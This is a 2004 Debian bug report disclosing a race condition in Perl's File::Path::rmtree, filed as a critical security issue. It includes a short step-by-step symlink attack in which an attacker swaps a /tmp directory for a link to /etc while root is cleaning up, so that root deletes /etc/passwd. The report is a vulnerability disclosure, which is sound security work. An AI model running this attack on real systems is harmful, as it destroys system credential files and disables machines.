Comment 1 for bug 11409

Message-Id: <email address hidden>
Date: Thu, 23 Dec 2004 10:00:00 +1100
From: Paul Szabo <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: perl-modules: File::Path::rmtree removes arbitrary

Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole

Following on from the "File::Path::rmtree makes setuid" issue, I notice
that rmtree may be tricked into removing arbitrary files.

Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:

  mkdir /tmp/psz
  perl -e 'open F, ">/tmp/psz/$_" foreach (1..1000)'
  touch /tmp/psz/passwd

While root is busy working on /tmp/psz (and this can be made as slow as
we like), attacker does:

  mv /tmp/psz /tmp/dummy
  ln -s /etc /tmp/psz

Root will then remove /etc/passwd.

Maybe it should be documented that rmtree must only be used if you can
be sure to have exclusive access to the tree.

Cheers,

Paul Szabo - <email address hidden> http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction